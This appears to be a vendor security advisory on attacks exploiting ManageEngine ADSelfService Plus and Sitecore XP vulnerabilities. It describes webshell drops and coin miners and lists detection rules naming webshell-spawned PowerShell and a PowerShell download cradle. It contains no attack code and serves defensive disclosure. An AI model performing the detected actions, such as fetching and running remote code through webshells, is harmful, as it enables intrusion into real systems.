Over the weekend of November 6, 2021, Rapid7’s Incident Response (IR) and Managed Detection and Response (MDR) teams began seeing opportunistic exploitation of two unrelated CVEs:
- CVE-2021-40539, a REST API authentication bypass in Zoho’s ManageEngine ADSelfService Plus product that Rapid7 has previously analyzed. CISA warned of attackers targeting CVE-2021-40539 in September; the vulnerability allows for unauthenticated remote code execution upon successful exploitation. As of November 8, 2021, Microsoft is also warning that a specific threat actor is targeting vulnerable ManageEngine ADSelfService Plus installations.
- CVE-2021-42237, a deserialization vulnerability in the Sitecore Experience Platform that allows for unauthenticated remote code execution in earlier versions. The affected versions of Sitecore XP appear to be several years old and unsupported other than through extended support contracts. With that said, there seem to be a higher number of organizations with vulnerable installations than expected based on the rate of compromise Rapid7 teams have observed.
Attackers appear to be targeting vulnerabilities with attacks that drop webshells and install coin miners on vulnerable targets. The majority of the compromises Rapid7’s services teams have seen are the result of vulnerable Sitecore instances. Both CVEs are patched; ManageEngine ADSelfService Plus and Sitecore XP customers should prioritize fixes on an urgent basis, without waiting for regularly scheduled patch cycles.
The following attacker behavior detections are available to InsightIDR and MDR customers and will alert security teams to webshells and powershell activity related to this attack:
- Webshell - IIS Spawns CMD to Spawn PowerShell
- Attacker Technique - PowerShell Download Cradle
InsightVM and Nexpose customers can assess their exposure to Zoho ManageEngine CVE-2021-40539 with a remote vulnerability check. Rapid7 vulnerability researchers have a full technical analysis of this vulnerability available here. Our research teams are investigating the feasibility of adding a vulnerability check for Sitecore XP CVE-2021-42237. A technical analysis of this vulnerability is available here.